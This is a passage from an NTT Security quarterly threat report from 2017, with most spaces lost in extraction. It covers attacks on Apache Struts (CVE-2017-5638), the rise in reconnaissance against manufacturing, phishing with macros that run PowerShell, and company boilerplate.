Struts Signatures and RulesNTTGrouphasidentifiedthefollowingsignaturesandruleswhichmayhelpmitigateattacks.Whileotherdetectionsmaybeavailable,NTTGrouphasidentifiedthesesignaturesandrulesasparticularly reliable .
Apache Struts: SummaryAttacksagainstApacheStrutshavenotreachedthesamelevelofattentionasWannaCry,Petya,ormanyotherattacks,butattackershavemadeconsistentattemptstoexploitthevulnerabilitiesinApacheStrutssincethePoCcodewasreleased.ApacheStrutshasprobablynotreceivedthelevelofattentionitdeserved,giventhatithasbeena“top7”attackconsistentlysince its release .
Asistruewithmanycurrentvulnerabilities,thesinglemosteffectivemitigatingcontrolistopatchsystemsinyourenvironment,inthiscase,ApacheStruts.Thatsaid,don’texpectApacheStrutsattackstodisappearuntilalotmoreorganizationshavecompletedthatpatching.
ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts
17 http://commons.apache.org/proper/commons-fileupload/
Copyright 2017 NTT Security 25
Summary
Summary Witha24percentincreaseinoverallactivity,Q2’17wascharacterizedbyawiderblendofattackmethodscomparedtoQ4’16.AttacksobservedinQ2’17includedavarietyofwebapplicationattacks,attacksallowingforremotecodeexecution,andphishing-basedattacks.Withinthesephishingcampaigns,however,cybercriminalsappearedtohaveanarrowerfocus,astheirpreferredvectorwasleveragingPowerShellcommandsinVBAmacroswithinmaliciousattachments.
NTTresearchersalsonotedanuptickinreconnaissance–possiblyindicatingattackpreparationduringtheupcoming3rdand4thquarters.ThisisatrendNTTSecurityresearchershaveobservedinpreviousyears,includingduringQ3andQ4’16,whenreconactivitydeclined.Thereisastronglikelihoodthatthistrendwillcontinueduringthelasttwoquartersof2017aswell,asattackersagainshifttomoretargetedattacksastheydeterminetheirtargets’vulnerabilities.
Thismaynotbodewellforthemanufacturingindustry,asalargepartofoverallreconnaissanceactivitywasaimedatthemanufacturingindustryduringQ2’17,and33percentofoverallactivityagainstthemanufacturingindustrywasreconnaissance-based.Iftrendsfromthepastfewyearscontinue,thisprobablyindicatesthatattacksandmalwarearelikelytoincreaseinmanufacturingorganizationsinthesecondhalfof2017.
Evenwithouttheloomingthreatofincreasedattackvolumes,themanufacturingindustryfacesavarietyofsecuritychallengesinitsongoingevolution.Withmoretechnologyandconnectivitycontinuallybeingintroducedintotheindustry,manufacturingisquicklybecomingahigh-valuetargetforcybercriminals.Whilenottypicallythoughtofashighly'attackable,'manufacturinghasbeenoneofthemostconsistentlyattackedindustriesoverthepastseveralyears,andwasthemosttargetedindustryinQ2‘17.Inadditiontopotentialthreatsuniquetothemanufacturers,theindustryalsofacesavarietyofthreats,prevalentacrossmanyindustries,includinginsiderandtechnicalthreats.
Thetacticsofcybercriminalswillcontinuetoevolve,asdoesthetechnologyavailabletothem.Thatbeingsaid,manythreatactorscontinuetousetriedandtruemethods(e.g.,unpatchedvulnerabilities),withmanyorganizationsfailingtoproperlysecuretheseattackvectors–alessonmanyorganizationslearnthehardway.
About GTICTheNTTSecurityGTICprotectsandinformsNTTSecurityclientsthroughsecuritythreatresearch,vulnerabilityanalysisandthedevelopmentofeffectivecountermeasures.Formoreinformation,includingvulnerabilitydisclosures18andthreatreports19,visittheresearchpageonwww.nttsecurity.com,ourblog20ordownloadrelatedwhitepapers21 .
About NTT-CERT NTT-CERT,adivisionofNTTSecurePlatformLaboratories,servesasatrustedpointofcontactforComputerSecurityIncidentResponseTeam(CSIRT)specialists,andprovidesfull-rangeCSIRTserviceswithinNTT.NTT-CERTgeneratesoriginalintelligenceregardingcybersecuritythreats,helpingtoenhanceNTTcompanies'capabilitiesinthesecurityservicesandsecurenetworkservicesfields.TolearnmoreaboutNTT-CERT,pleasevisitwww.ntt-cert.org22 .
About NTT SecurityNTTSecurityisthespecializedsecuritycompanyofNTTGroup.Withembeddedsecurity,weenableGroupcompanies(DimensionData,NTTCommunicationsandNTTDATA)todeliverresilientbusinesssolutionsforclients’digitaltransformationneeds.NTTSecurityhas10SOCs,sevenR&Dcenters,over1,500securityexpertsandhandleshundredsofthousandsofsecurityincidentsannuallyacrosssixcontinents.
NTTSecurityensuresthatresourcesareusedeffectivelybydeliveringtherightmixofconsultingandmanagedservicesforNTTGroupcompanies–makingbestuseoflocalresourcesandleveragingourglobalcapabilities.NTTSecurityispartoftheNTTGroup(NipponTelegraphandTelephoneCorporation),oneofthelargestICTcompaniesintheworld.Visitnttsecurity.comtolearnmore.
18 https://www.solutionary.com/threat-intelligence/vulnerability-disclosures/19 https://www.solutionary.com/threat-intelligence/threat-reports/20 http://www.solutionary.com/resource-center/blog/21 http://www.solutionary.com/resource-center/white-papers/22 http://www.ntt-cert.org